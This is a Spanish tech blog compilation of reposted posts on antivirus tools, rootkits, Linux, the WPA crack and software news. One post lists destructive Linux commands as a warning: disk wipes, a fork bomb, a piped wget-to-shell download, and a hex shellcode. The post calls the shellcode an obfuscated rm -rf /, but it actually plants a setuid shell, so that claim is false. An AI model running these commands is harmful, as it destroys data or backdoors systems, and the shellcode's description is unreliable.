Mx One, antivirus para dispositivos de almacenamiento extraíbles

Mx One

Uno de los medios más comunes por donde se trasladan los virus, luego de internet obviamente, son los dispositivos de almacenamiento extraíbles, léase reproductores de MP3, pendrives, discos externos, etc, por eso es muy importante estar siempre prevenidos con un buen antivirus para esos casos.
Mx One es un antivirus destinado especialmente a proteger nuestros dispositivos de almacenamiento extraíbles. Algo que vale la pena rescatar es que es de desarrollo mexicano, algo que, aparte de su eficiencia, me empujó más para comentarlo en el blog.
La descarga es muy liviana (1MB), y cuando lo tenemos en nuestro equipo tenemos que descomprimir el archivo y ejecutarlo (tiene un FAQ) para instalar el antivirus donde queramos, por ejemplo para instalarlo en un USB elegimos esa opción, y nos pedirá que conectemos el dispositivo, lo instala y listo.
Ahora cuando queramos escanear el dispositivo extraíble lo tendremos siempre a mano vayamos a donde vayamos. Algo que me gustó es que la interfaz es multilenguaje, otro punto a favor de esta aplicación.

Mx One Scanner

Visto en Jimbalo Vos (gracias por el aviso!)

(visto en PuntoGeek)

Cuidado con los rootkits

Un rootkit es un software capaz de esconderse a sí mismo y también a otros programas, procesos e incluso puertos que posibilitarán al intruso ejecutar acciones maliciosas en el PC infectado

El término de rootkit hace referencia a un grupo de herramientas utilizadas por los ciberdelincuentes para ocultar su identidad y tener así el control de una máquina infectada sin ser detectado. Este problema afecta a diferentes sistemas operativos: Windows, Linux, Solaris, etc.

Hay dos tipos de rootkits. Por un lado, tenemos los que se integran en el núcleo. Estos modifican parte del código del núcleo del sistema para ocultar una puerta trasera mediante la que el atacante pueda entrar en el equipo infectado. Son los más peligrosos, ya que su detección es muy complicada.

Por otra parte, están los que funcionan a nivel de aplicación. Pueden cambiar archivos ejecutables de la máquina infectada por otros que contengan troyanos o que modifiquen la ejecución en algo que desee el atacante.

Paso 1

Entornos de riesgo

En nuestros ordenadores domésticos, los rootkits tienen una alta peligrosidad. Tened en cuenta que cada día se usa más la banca por Internet, por ejemplo, y los rootkits pueden ser capaces de interceptar datos procedentes de muchos sitios, incluido el teclado (keyloggers).

Los rootkits ocultan inicios de sesión, procesos, archivos y los logs generados en los registros. Habitualmente, se consideran troyanos. Las entidades bancarias, conocedoras de todos estos sistemas, van buscando nuevas vías de acceso a sus zonas privadas con nuevos métodos.

El método de la tarjeta de claves personalizada que entrega la entidad de forma individual para entrar en las páginas web comprometidas es considerado como uno de los más seguros, pues se trata de un producto cartesiano de valores; el sistema te pedirá una coordenada de forma aleatoria y, además, no se guarda en el ordenador. En definitiva, la tarjeta será tu firma electrónica y, en general, se utilizará cada vez que el sistema te pida una clave.

Paso 2

Para qué se usan

El objetivo más usual del rootkit es el de ocultar algunas aplicaciones que actúan en el sistema infectado. Una vez que se logra entrar por primera vez al ordenador atacado, normalmente se deja abierta una puerta trasera, como por ejemplo una consola que esté oculta al usuario y que se ejecute cada vez que el equipo invadido se conecte a Internet. En general, todo tipo de aplicaciones que usan estos ciberdelincuentes pueden ser ocultadas por los rootkits.

Pero, la búsqueda de datos importantes no es lo único para lo que se usan. También se emplean para lanzar ataques contra otros equipos desde el sistema infectado, quedando el atacante oculto y, por tanto, a salvo de posibles represalias. Un ejemplo claro de esto lo tenemos en el spam o correo basura.

Paso 3

Difícil detección

La detección es muy compleja, pues, si el sistema operativo está infectado, no es fiable. Es decir, algo tan sencillo como pedir la lista de procesos que se están ejecutando o ver los archivos de una determinada carpeta pasan a ser peticiones que pueden no dar el resultado real porque tal vez estas peticiones estén siendo alteradas por las aplicaciones que oculta el rootkit. Y esto es sólo un ejemplo.

Los rootkits suelen monitorizar la actividad de la máquina, de tal forma que ante un escaneo que los esté buscando se desactivan hasta que se finaliza su búsqueda. Este comportamiento de invisibilidad al detectar que alguien se acerca es lo que hace complicada su detección.

Paso 4

El arma de F-secure

Los fabricantes de antivirus han incorporado en sus aplicaciones herramientas de búsqueda para localizar movimientos sospechosos. Esto ha llevado a los creadores de rootkits a diseñar mecanismos de defensa contra los antivirus. Para sistemas Windows, F-Secure pone a nuestro alcance el detector de rootkits BlackLight, que se puede descargar gratuitamente desde www.f-secure.com/blacklight.

Después de instalarlo y aceptar el Acuerdo de Licencia de Uso, podremos empezar a sacar todo el partido a esta sencillísima herramienta. Pulsaremos el botón Scan para comenzar a analizar el equipo en busca de elementos ocultos y, si se localizara alguno, procederíamos a su limpieza a través del Paso 2, Step 2 - Cleaning previsto por el programa.

Finalmente, se nos presenta un resumen de las acciones realizadas; esto es, escaneo de procesos, archivos o carpetas ocultas, número de intrusos localizados y limpieza o renombre de los archivos afectados.

Paso 5

La propuesta de panda

Panda también cuenta con su Anti-Rootkit, un detector gratuito disponible en http://research.pandasecurity.com/archive/New-Panda-Anti_2D00_Root kit-_2D00_-Version-1.07.aspx. Como el de F-Secure, es muy asequible para cualquier usuario; pero, a diferencia de aquél, está en castellano.

Éste se organiza igualmente en tres pasos (escaneo, limpieza y resumen final), y lleva a cabo un análisis de los procesos y drivers en ejecución, el Registro de Windows, así como ficheros y ADS.

Paso 6

Otras alternativas

Otra aplicación de detección y eliminación de rootkits es Rootkit Revealer de Sysinternals, propiedad de Microsoft desde el 2006, que se hizo famosa por detectar el rootkit de Sony para la gestión de derechos digitales. Aunque hay algunos rootkits que ya están programados para evitar a este detector, se soluciona con algo tan sencillo como renombrar el ejecutable. Para Linux, los más populares son chkrootkit y rkhunter.

Cómo estar más seguro

En 2007, PandaLabs detectó un 272% más de ejemplares de rootkits que en 2006. En palabras de Luis Corrons, director técnico de PandaLabs, «actualmente, los ciberdelincuentes ya no buscan fama o notoriedad, sino conseguir un beneficio económico de sus infecciones.

Para lograr este fin, es primordial pasar inadvertido, ya que de esta manera aumentará el tiempo que el código malicioso permanece en el PC y, además, se evitará causar una alarma social y que los usuarios se protejan adecuadamente. Para esta labor, los rootkits son una herramienta idónea(...)». Cada día aparecen más de 3.000 nuevos ejemplares de malware, por lo que Panda nos recomienda:

1. Tener instalada una solución de seguridad eficaz y actualizada que sea capaz de detectar incluso amenazas desconocidas.

 

2. No llevar a cabo conductas poco seguras: abrir correos procedentes de fuentes desconocidas, abrir vínculos que lleguen por correo o mensajería instantánea en lugar de teclearlos en el navegador, o descargarse archivos sospechosos a través de redes P2P.

3. Mantener actualizados todos los programas que haya instalados en el equipo, para que ninguna vulnerabilidad sea empleada para introducir malware en el PC.

4. Analizar el ordenador en busca de malware con una solución on-line (…). Estas herramientas tienen acceso a una base mayor de conocimiento y, por lo tanto, son capaces de detectar más malware que las soluciones instaladas en el equipo.

6 herramientas gratuitas para ejecutar aplicaciones de Windows en Linux

Al cambiar de Windows a un sistema operativo más seguro cómo Linux, puedes tener muchas dificultades. Como, por ejemplo, es posible que no puedas encontrar las aplicaciones que necesitas para hacer tu trabajo diario. A pesar de que puedes encontrar casi todos los reemplazos de una aplicación de Windows para Linux, pero si este no es el caso hay varias formas a través de las cuales puedes ejecutar tus aplicaciones favoritas de Windows en el sistema operativo Linux. En Smashing Apps hay una lista de 6 herramientas gratuitas que te ayudarán a ejecutar tus o aplicaciones favoritas de Windows en Linux.

1. Wine es una aplicación Open Source que consiste en una implementación de API de Windows en la parte superior de X, OpenGL y Unix, así que con Wine no necesitas tener Windows. Más sobre Wine.
2. VirtualBox es un software de virtualización x86, y no sólo puede funcionar sobre Linux sino que también con Mac, Windows y una gran variedad, y lo que puede hacer es instalara Windows en una máquina virtual, pero además de poder instalar Windows puedes instalar: FreeBSD, Linux, OpenBSD, OS/2 Warp y Solaris. Más sobre VirtualBox.
3. Qemu es un emulador genérico y máquina virtual de código abierto, Qemu puede ejecutar sistemas operativos y programas diseñados para una máquina en especifico (por ejemplo, un procesador ARM) en un equipo diferente (por ejemplo, tu propia PC). Más sobre Qemu.
4. Bochs es un emulador gratuito que puede correr casi cualquier sistema operativo, desde DOS, Windows 95/2000/XP. Más sobre Bochs.
5. rdesktop es un cliente para el protocolo RDP de Microsoft que está bajo la licencia GNU/GPL y está disponible para Linux con loq ue podrás ejecutar aplicaciones de Windows de manera remota. Más sobre rdesktop.
6. Xen es una máquina virtual de código abierto sirve para poder ejecutar instancias de sistemas operativos con todas sus características, de forma completamente funcional en un equipo sencillo, en este caso programas de Windows en Linux. Más sobre Xen. 

(visto en el blog de CarlosLeopoldo)

7 comandos peligrosos para Linux

Si eres nuevo en Linux, las oportunidades de que alguién te engañe diciendote que uses algún comando para destruir tu sistema son muy altas, por eso es bueno conocer los comandos más peligrosos para GNU/Linux, en Tech Source from Bohol hay un listado de los 7 comando más mortales para Linux, (traducción en Nierox) , algunos de estos comandos pueden formatear el disco duro, dañar los archivos, etc.

1. rm -rf /
   Este comando borrará de manera recursiva y convincente todos los archivos en el directorio raíz, aquí tienes un video para ver en acción el comando rm -rf /.
2. char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
   Esta es la versión hexadecimal de rm-rf / que pueden engañar hasta a los usuarios expertos de Linux.
3. mkfs.ext3 /dev/sda
   Este comando formatea la partición que se menciona después de mkfs.
4. :(){:|:&};:
   A este comando se le conoce cómo bomba fork, ejecutar un gran número de procesos hasta que el sistema se congela. Esto puede conducir a la corrupción de datos.
5. any_command > /dev/sda
   Este comando provoca perdida total de datos, en la particion que se menciona en el comando
6. wget http://alguna_fuente_no_confiable -O- | sh
   Esto descarga paquetes de alguna fuente no confiable y la ejecuta, debes tener mucho cuidado ya que puede ser código malicioso
7. mv /home/tu-carpeta-home/* /dev/null
   Este comando va a mover todo el contenido de tu carpeta Home a un directorio que no existe, esto significa que ya nunca volverás a ver tus archivos.

Por ninguna razón vayas a ejecutar estos comando en Linux, esto es más bien con fines didácticos.
(Visto en el blog de CarlosLeopoldo)

Fallo de seguridad en el núcleo de Windows Vista

Que un sistema operativo tenga fallos de seguridad no es ninguna novedad; los tiene Windows, lo tiene Mac OS X, los tiene Linux y los tienen otros. Que estos estén en el núcleo del sistema y que su fabricante no lance un parche tan pronto como sea posible para solucionarlos es un problema.
Es lo que le ocurre a Windows Vista, en el cual se ha descubierto un problema de seguridad que afecta a la capa de red. De momento, se ha conseguido, mediante un buffer overflow, corromper la memoria y provocar una pantallazo azul.
El problema de este tipo de fallos es que siempre pueden ir a peor, descubriéndose nuevas formas de atacarlos que los hagan más peligrosos. Según los investigadores, podría conseguir ejecutar código, algo tampoco demasiado grave teniendo en cuenta que requiere permisos de administrador para poder ejecutar la función afectada.


Pero al estar afectada la capa de red, peor sería si se confirma que se puede activar este bug de forma remota. Todavía no se ha demostrado, pero parece que un paquete DHCP especialmente creado para ello podría aprovechar el error para iniciarlo de forma remota.
Microsoft está al tanto del problema y afirma que lo solucionarán en el próximo Service Pack para Windows Vista, del cual no se conoce todavía la fecha de salida, aunque se espera para los primeros meses del próximo año. Parece que si no hay un exploit público Microsoft no tiene prisa en lanzar la solución, así que esperemos que el parche llegue antes o que nadie consiga descubrir como activarlo de forma remota.
Por cierto, el único sistema afectado es Windows Vista, no así anteriores como XP, ya que el código de red se reescribió completamente en esta versión.
Vía | CNET.
(visto en Genbeta)

Diseña páginas web dibujándolas con el ratón gracias a Drawter

Si el escribir CSS y HTML es muy complicado para ti y ninguno de los típicos “Layouts” que hay por ahí para usar en tus diseño se adapta a tus necesidades, en aNieto2K encontré una herramienta que debes probar, se llama Drawter.
Drawter es una herramienta creada en JavaScript usando la biblioteca jQuery que te proporciona la posibilidad de dibujar literalmente el código de tu sitio web. Funciona en todos los navegadores web lo que lo convierte en una herramienta realmente útil.

Drawter Beta 2

Para sacarle el mejor provecho a Drawter se recomienda tener un poco de conocimientos de HTML y CSS, también se necesita tener al menos 256MB de RAM y 800Mhz de procesador.
Drawter no es una herramienta para aficionados, por el momento, pero el equipo detrás del proyecto promete poner todos los esfuerzos posibles para lanzar una nueva versión llamada “Amateur”, con la que prometen que alguien sin conocimientos en HTML y CSS será capaz de crear sitios web sin ningún conocimiento de HTML o CSS.
Aquí también tienes un video (Screencast) demostrando el funcionamiento de Drawter y algunos atajos de teclado disponibles para Drawter:

• ctrl+1 - Modo de dibujo (Draw Mode)
• ctrl+2 - Modo edición (Edit Mode)

Enlace a la web de Drawter.

(visto en el blog de CarlosLeopoldo)

Así se financian los grandes proyectos del software libre

Poco a poco el software libre está dejando de ser un producto reservado a una minoría de usuarios avezados a las nuevas tecnologías y se está abriendo camino entre sectores cada vez más amplios de la población, que utilizan con normalidad navegadores como Firefox, distros de GNU/Linux como Ubuntu o programas P2P como el eMule.

Pero, ¿cómo se gestionan los proyectos emblemas del software libre? ¿Las empresas que se dedican profesionalmente a ello están obteniendo una remuneración económica acorde a la popularidad de los productos que desarrollan? ¿Y las fundaciones sin ánimo de lucro que hay detrás de algunos de estos programas? ¿Cómo se financian? ¿Tienen dificultades para conseguir el dinero que necesitan para pagar los costes de los servidores, del ancho de banda, de la asesoría legal o de sus oficinas?

Para responder a estas y otras preguntas he elaborado este artículo en el que he tratado de exponer de manera resumida cómo les va en materia económica a algunos de los desarrollos emblema del software libre. Comencemos:

· MOZILLA (Firefox, Thunderbird, Camino, etc)
La gestión de los ingresos que generan los programas desarrollados por la Mozilla Foundation, con el navegador Firefox y el cliente de correo electrónico Thunderbird a la cabeza, corre a cargo de la Mozilla Corporation, una empresa filial que se creó el 3 de agosto del 2005 y que en la actualidad cuenta con más de 100 empleados.

En el 2006 gestionó unos ingresos de 66,8 millones de dólares, una pequeña parte de los cuales proceden de donaciones anónimas de particulares. Aún así, el gran grueso proviene de Google, que con casi 60 millones de dólares anuales, es el gran mecenas de esta organización. El acuerdo de patrocinio actual se extenderá hasta, al menos, el 2011.


· CANONICAL (Ubuntu)
A pesar de haberse convertido en la distribución de GNU/Linux más popular del momento, Ubuntu no es un proyecto económicamente rentable. La estructura operativa se mantiene en pie gracias al empeño y a la fortuna personal de Mark Shuttleworth, un sudafricano que en diciembre de 1999, en plena burbuja de las punto.com, se convirtió en multimillonario tras vender Thawte Consulting, la empresa que había fundado 4 años atrás, a VeriSign por 575 millones de dólares.

El mes pasado Shuttleworth declaró que va a seguir aportando dinero a Canonical, la compañía que guía los destinos de Ubuntu, durante otros 3 a 5 años más. A partir de entonces, espera que el proyecto sea autosuficiente gracias a los ingresos provinientes de firmas interesadas en recibir servicio técnico especializado para sacar el máximo partido a esta distro.


· NOVELL (SUSE Linux Enterprise, OpenSUSE)
Novell es una de las empresas ligadas al software libre a la que mejor le están yendo las cosas desde el punto de visto económico. Cabe remarcar, eso sí, que la mayor parte de sus ingresos no proceden de SUSE Linux, sino de las licencias de los programas de código privativo que comercializa.

A día de hoy posee una capitalización bursátil de 1.470 millones de dólares, en el 2007 obtuvo unos ingresos de 935 millones de dólares y unos beneficios netos de 44,5 millones. Las previsiones para el ejercicio en curso se sitúan entre los 940 y los 970 millones de dólares.

Respecto a la entrada de capital procedente de la explotación de SUSE Linux Enterprise, los datos más actualizados que he encontrado son del primer trimestre de este año, en el que las ventas aumentaron un 65% respecto al mismo periodo del 2007 y llegaron hasta los 28 millones de dólares.


· KDE
Como tantos otros proyectos de software libre, el desarrollo de este entorno de escritorio se fundamenta en la colaboración desinteresada de infinidad de voluntarios, si bien también cuenta con el apoyo de compañías como Novell, Trolltech o Mandriva, que pagan a programadores para que participen en el proyecto.

La financiación llega gracias a las pequeñas aportaciones individuales de los seguidores de KDE, pero también mediante la esponsorización que realizan universidades, millonarios como Mark Shuttleworth o empresas del calibre de Intel y Novell.


· GNOME
El caso de GNOME es muy parecido al de KDE, ya que además de las aportaciones voluntarias de miembros y seguidores de este escritorio cuenta con la esponsorización de compañías como Google o Motorola. La cuantía de dichas ayudas la desconozco. Si sabéis a cuánto ascienden, indicadlo en los comentarios por favor.


· RED HAT (Red Hat Enterprise Linux, Fedora, JBoss)
Esta empresa asentada en Raleight (Carolina del Norte) tuvo el año pasado unos ingresos de 400 millones de dólares, mientras que los beneficios netos se quedaron en unos nada despreciables 59,9 millones de dólares. En el primer trimester del año fiscal de 2009, esta empresa que cuenta con 2.200 empleados y tiene una capitalización bursátil de 2.190 millones de dólares, ha obtenido un saldo positivo de 156,6 millones de dólares.

El modelo de negocio de Red Hat se sustenta en la prestación de un servicio de asistencia técnica profesionalizado a empresas de todo tipo y por el que cobra unas cantidades que oscilan entre los 349 dólares y los 8.499 dólares anuales.


· GIMP
Un proyecto tan conocido dentro del mundillo del software libre como GIMP no cuenta con una estructura profesionalizada que se encargue de buscar vías para la obtención de ingresos más allá del típico apartado en su web destinado a captar pequeñas aportaciones por parte de seguidores de este software.


· APACHE (Servidor Web Apache, SpamAssassin, Tomcat, etc)
El servidor web Apache es desarrollado por una comunidad de programadores bajo el paraguas de la Apache Software Foundation, que cuenta con un programa de esponsorización tanto para organizaciones y empresas como para las pequeñas contribuciones individuales.

A las primeras se les ofrecen 3 niveles de colaboración en función de la cuantía que estén dispuestas a aportar: Platinum Sponsorship (donación de 40.000 dólares anuales), Gold Sponsorship (donación de 20.000 dólares anuales) y Silver Sponsorship (donación de 40.000 dólares anuales). Microsoft, Google y Yahoo donan forman parte del nivel de patrocinio más alto.


· EMULE
Convertido por derecho propio en uno de los demonios de la industria discográfica y las productoras de cine, la web de este programa P2P contiene un apartado para las donaciones... que aparentemente no funciona (al menos yo no he sabido hacerlo funcionar) y no permite efectuar pequeños pagos para sostener el proyecto.

Sí que existe en cambio una tienda online en la que se pueden adquirir todo tipo de productos relacionados con eMule como camisetas, peluches, tazas, gorras, delantales, calzoncillos e incluso baberos. ¿Cuánto consiguen recaudar? Un misterio, aunque presumiblemente no será demasiado.


· MENÉAME
Este no es desde luego un proyecto de un alcance tan global como el del resto de casos que he tratado en este artículo, pero dado que lo uso a diario y al fin y al cabo soy yo quien escribe estas líneas, pues allá vamos

La vía de financiación más obvia para Menéame procede de la publicidad de AdSense que se incluye en formatos de 728x90 (bajo el logo) y de 300x250 (bloque de la derecha). Teniendo en cuenta el perfil de los visitantes habituales del sitio, mucho me temo que las ganancias derivadas de la colocación de estos banners deben ser más bien bajas, por no decir rematadamente bajas. Suerte que tienen muchas visitas, que sino...

Por otra parte, y de acuerdo a lo aparecido en los medios, el 2 de noviembre del 2006 Martín Varsavsky, fundador de empresas como Jazztel y Ya.com, se hizo con el 10% del capital de Menéame y a finales del 2007 aumentó su participación hasta el 33%.

El otro método que he encontrado (si hay más, lo decís) es a través de la venta de objetos adornados con el logo del portal (1 y 2). Así, se pueden adquirir camisetas, bufandas, bolsas de viaje, sudaderas, agendas, relojes de pared, tazas, etc.

(visto en Abadía Digital)

DAZ Studio: Animación 3D simple y gratis

Cada vez que se menciona algo sobre modelaje 3D, dos cosas suelen venir a la mente de cualquier interesado: Las herramientas cuestan una fortuna y son demasiado complicadas de manejar. Y si bien la primera impresión que puede entregar DAZ es la de una aplicación compleja, es lo suficientemente simple como para poder empezar a explorar el mundo de las animaciones 3D.
Perdiéndole el miedo
Recuerdo que la primera vez que vi una versión de 3D Studio para DOS se me puso la piel de gallina. Era chino básico por donde se lo mirara, y desde entonces he asociado la expresión "3D" a la imagen de un manual de 850 páginas como mínimo, equivalente a un curso de un año y medio. Esto me llevó a tenerle un terror tremendo a las aplicaciones de animación y modelaje 3D, mientras veo a mis amigos crear mundos enteros en apenas un rato.
Pero tanto mis amigos como otros en el rubro han confesado que el modelaje 3D no es algo que se aprende de la noche a la mañana. Las herramientas profesionales tienen tantas opciones y variables que por algo se las llama "profesionales". No sólo se trata de adquirir el programa, sino de tener la voluntad y el tiempo para aprender a utilizarlo. Sin embargo, de tanto en tanto aparecen algunas aplicaciones que, si bien no tienen todas las opciones de las aplicaciones comerciales más robustas, son más que suficientes como para que un interesado en la materia pueda tener una clase de "primer contacto" con este mundo.

Victoria es el modelo de ejemplo en DAZ Studio

DAZ Studio cae perfectamente en esa categoría de "renderizado para hobbystas", una herramienta que te permitirá posicionar modelos en diferentes entornos, realizar ajustes para que adquieran poses específicas y luego renderizar la imagen para darle el toque final. La mejor parte es que puedes hacer todo esto sin tener que pagar un centavo. Pero si ese es el caso, ¿cuál es el negocio de los desarrolladores? El de vender modelos adicionales y más completos, por supuesto. La descarga de DAZ Studio viene con el modelo de Victoria (la niña con la pelota de voleyball), pero en el caso de que desees incorporar más modelos al programa, deberás hacerlo a través de packs. Algunos de ellos pueden conseguirse en forma gratuita, pero los más elaborados y completos se adquieren a través de la página oficial, con precios que pueden superar los €75.

"¡Wilson!"

"¡Al fin te encuentro!"

"Mira para la foto, Wilson"

De entre las diferentes funciones del programa, la que tal vez de más satisfacción a los novatos es la "Pose Tool", que permite modificar la postura del modelo con sólo escoger una de sus extremidades y mover el ratón. Al principio cuesta un poco lograr la pose exacta que uno busca, pero no es imposible. Al mismo tiempo, DAZ posee varias "pre-poses" que pueden aplicarse al modelo, desde una posición de carrera hasta estar "pensativo". Los tutoriales que posee DAZ son muy variados, acompañados por una buena cantidad de contenido en línea. No necesitas leer ninguno de ellos para tomar un modelo y colocarlo en una pose, pero si deseas aprender a cómo generar nuevas luces o crear un ángulo de cámara específico, lo mejor será que les des una leída.

"¡Horror! ¡Es la pelota de 'El Prisionero'!"

"¡Adiós, Wilson!"

"Hola guapo, ¿quieres salir?"

Un ejemplo de un renderizado final

Después de haber creado la escena ideal, lo mejor será que le apliques el renderizado correspondiente. Las capacidades del programa en este punto son muy buenas, logrando aprovechar los recursos de tu tarjeta de vídeo en caso de que te lo permita. A pesar de tratarse de una aplicación para modelaje 3D, sus requerimientos son bastante modestos. Apenas con un Pentium III de 700 Mhz y una tarjeta de 128 MB compatible con OpenGL ya deberías poder trabajar con DAZ. Sin embargo, la velocidad final del renderizado depende exclusivamente del poder de tu ordenador, por lo que sería ideal contar con toda la velocidad posible.

El registro es rápido y sin inconvenientes

Si perteneces de forma absoluta a las legiones de principiantes en el mundo del modelaje 3D, entonces DAZ puede ser una muy buena primera parada para ti. Como toda herramienta de esta clase, tiene cierta curva de aprendizaje, pero lo bueno es que no es tan prolongada como suele suceder con aplicaciones más complejas.

Una verdadera caja de arena si así lo quieres, para que puedas entretenerte un rato. Ah, no olvides que es completamente gratis. Sólo será necesario que te registres en el sitio para que te envíen el número de serie que activará el programa. Después de eso, tu habilidad es el límite. ¡Buena suerte!

Enlaces relacionados:
Haz clic aquí
(visto en Neoteo)

YouTube y Hollywood: Comienza una nueva era

Todos hemos visto, desde hace varios meses, los clips de películas y episodios de diferentes series de televisión que se encuentran disponibles en Youtube. Esta tendencia no parece detenerse, sino todo lo contrario. Se sabe que al menos uno de los grandes estudios de Hollywood comenzaría, en breve, a emitir por ese medio películas completas.

El acuerdo, prácticamente listo para comenzar a funcionar

En efecto, YouTube se encuentra negociando, con al menos un estudio de Hollywood, la posibilidad de comenzar a “emitir” de películas completas. El acuerdo estaría prácticamente listo para comenzar a funcionar y, en unos dos o tres meses, podríamos tener en la pantalla de nuestro ordenador películas completas en el sitio de vídeos de Google.

Las películas serían patrocinadas con anuncios y se verían en streaming. La financiación provendría de la publicidad, un negocio que Google maneja al dedillo. No se sabe qué formato de anuncios se utilizará finalmente, aunque hay al menos tres opciones en danza:  1) impresiones de “banners” 2) “preroll”, es decir un anuncio al inicio del vídeo y 3) "postroll" (anuncios al final). Claro, también puede que sean todas estas opciones juntas.

No se sabe qué formato de anuncios se utilizará finalmente

Una de las condiciones impuestas por los estudios cinematográficos para poner sus contenidos completos en YouTube es tener la decisión final sobre el formato de estos anuncios. Algunos creen que esto podría representar un cambio de dirección en el modelo de negocios de YouTube, que estaría renunciando a rentabilizar los vídeos publicados por los usuarios, que hoy por hoy constituyen la mayor parte de sus contenidos. De alguna manera se estaría abandonado la idea original del proyecto, para convertirse en un servicio similar al que ofrecen sitios como Hulu.com, uno de los modelos más exitosos de vídeo en streaming.

Lo que todavía no queda en claro es la disponibilidad geográfica de esas películas. Recordemos que, para acceder a Hulu, hay que usar algunos truquillos…

Enlaces relacionados:
CNET
(visto en Neoteo)

Wi-Fi: Cifrado WPA crackeado

Evidentemente, el 2008 no está siendo un buen año para la seguridad de las redes inalámbricas. No solo se ha podido violar su seguridad utilizando un GPU, si no que también se han reventado las claves con encriptación WPA. No es que fuesen especialmente sólidas, pero  ahora se ha logrado penetrar en redes WiFi con claves WPA en solo unos minutos. ¿Tendremos que volver a los cables?

Transmitir datos cifrados mediante WPA es poco fiable

Resulta muy cómodo poder enviar y recibir bytes mediante ondas de radio, y de hecho, es la única forma en que nuestros dispositivos móviles de acceso a datos (desde PDAs hasta smartphones, pasando por todo un zoológico de modelos de ordenadores portátiles) sean de alguna utilidad. Sin embargo, el sistema tiene una pega: los datos no van por el interior de un cable, lo que permite a un eventual atacante acceder a ellos sin necesidad de tener contacto físico con la “línea de transmisión”. Para evitar que cada  foto que nuestra chica nos envía con poca ropa sea vista por todo el mundo, se implementan una serie de protocolos de seguridad tendientes a hacer la vida de los hackers un poco mas complicada.

Uno de esos estándares de cifrado para redes WiFi es el muy popular “WiFi Protected Acess” (WPA para los amigos), que en estos días está siendo noticia gracias al trabajo de Erik Tews y Martin Beck. Estos especialistas en seguridad se han convertido es una especie de héroes para los hackers al demostrar lo poco fiable que puede ser transmitir datos cifrados mediante WPA. Tan bien les ha ido con el sistema de hackeo, que la semana próxima van a demostrar como funciona en Tokio, en el marco de la conferencia PacSec.

Es muy cómodo poder enviar y recibir bytes mediante ondas de radio

Los especialistas aseguran que solo les toma entre 12 y 15 minutos descifrar la manera de acceder al protocolo que se emplea en la comunicación entre el router y un ordenador. Según afirman, han encontrado una forma de quebrar el protocolo llamado TKIP (por Temporal Key Integrity Protocol), que el utilizado por el estándar WPA en un periodo muy corto de tiempo, mucho menor que el logrado con los métodos de fuerza bruta empleados hasta la fecha.

Pero no todo son éxitos. Aun no han podido crackear las claves de cifrado de los datos que van de los ordenadores al router, es decir, en sentido contrario, aunque probablemente se logre en poco tiempo. Muchos expertos en seguridad recomiendan pasarse a WPA2, soportado por la gran mayoría de los routers del mercado y, al menos en teoría, bastante más seguro que WPA. Erik y Martin, por el contrario, suponen que no es más seguro en cuanto a este tipo de ataque toca, y es que las conexiones más seguras son las hechas mediante acceso físico directo.

Nuestros gadgets pueden estar siendo espiados

Por lo pronto, parece que si necesitas mover datos privados entre dos dispositivos, lo mas seguro es agregar una capa de seguridad extra, cifrando los datos con algún otro tipo de software (RSA, por ejemplo) antes de ponerlos en el aire.

Obviamente, la solución no pasa por volver a los cables para sentirnos seguros, sino en adoptar mejores protocolos de seguridad. La potencia de los ordenadores esta haciendo que algunos de los algoritmos creados para brindar confidencialidad estén quedando obsoletos, a pesar de haber sido diseñados recientemente. Así que ya sabes: di a tu chica que esas fotos te las pase en un pendrive.

Enlaces relacionados:
Arstechnica
(visto en NeoTeo)

Truco para descargar Windows Vista Service Pack 2 Beta

El Service Pack 2 de Windows Vista todavía no está disponible para todos nosotros, sólo lo pueden descargar las personas acreditadas cómo “Beta Testers” por Microsoft, pero por mucho que se trate de impedir que otras personas puedan descargar e instalar esta versión, encontré en Cybernet News que alguién encontró un truco para poder saltarse ese candado.
Así que si quieres probar la versión beta, por versión beta debes entender que no es una versión estable y puede causarte algunos problemas pero si aún así eres curioso el truco es muy sencillo y consiste en los siguientes pasos:

1. Descargar este archivo .BAT.
2. Ahora debemos ejecutar el archivo .BAT, esto lo debemos hacer desde una cuenta de administrador de Windows Vista.
3. Y por último debemos entrar a Windows Update para comprobar si hay actualizaciones disponibles y ahí te debe aparecer el Service Pack 2 cómo una actualización.

Entre las novedades que el Service Pack 2 traerá a Windows Vista encontramos:

• Soporte para Bluetooth
• Incluye Windows search 4.0 a más velocidad
• Soporte para grabar discos Blu-Ray de forma nativa, sin la necesidad de instalar ningún programa adicional.
• Incorporación de la tecnología Windows Connect Now (WCN), que facilita la creación de redes inalámbricas domésticas.
• Mejoras en el soporte al sistema de archivos exFAT (usado por tarjetas SD, microSD y memorias flash en general)

Se espera que Windows Vista SP2 sea lanzado al público en general en la primera mitad del año 2009, esto se sospecha porque esta versión beta del Service Pack 2 tiene una fecha de expiración cerca de esas fechas.

Action Method, desarrolla con mayor eficacia tus proyectos

La continua aparición de aplicaciones online que nos permiten gestionar más eficazmente nuestros proyectos nos abre el abanico de posibilidades para elegir aquella o aquellas aplicaciones que más se ajusten a nuestras necesidades. Cada una de ellas dispone de sus propias particularidades que siempre habrá que evaluar.
Y dentro del abanico de posibilidades nos encontramos con Action Method, otra aplicación online que nos permite la gestión de nuestros proyectos de manera eficaz. Pero en esta ocasión nos encontramos con una herramienta completamente diferente en su planteamiento en relación al resto de herramientas online de su misma categoría.


Una vez nos demos de alta, nosotros nos hemos dado de alta en su versión gratuita que nos permite gestionar hasta 50 proyectos, nos encontramos con la propia aplicación: Su entorno consta una barra horizontal superior de acciones, y luego una barra lateral que nos permite la creación de proyectos y grupos, con buzón de comunicaciones de actividades y otras opciones, y el área principal.
Las acciones nos permiten:

• Añadir pasos, delegando su realización a cualquier contacto, pudiendo establecer fechas finales, y también tiempo para su realización. Les asignaremos uno de los colores y los marcaremos una vez finalizados.
• Añadir referencias, donde podemos añadir notas, archivos adjuntos, enlaces o cualquier otra información.
• Añadir backburners, entendiéndose como un banco de ideas al que acudir más adelante ya que de momento no son realizables.
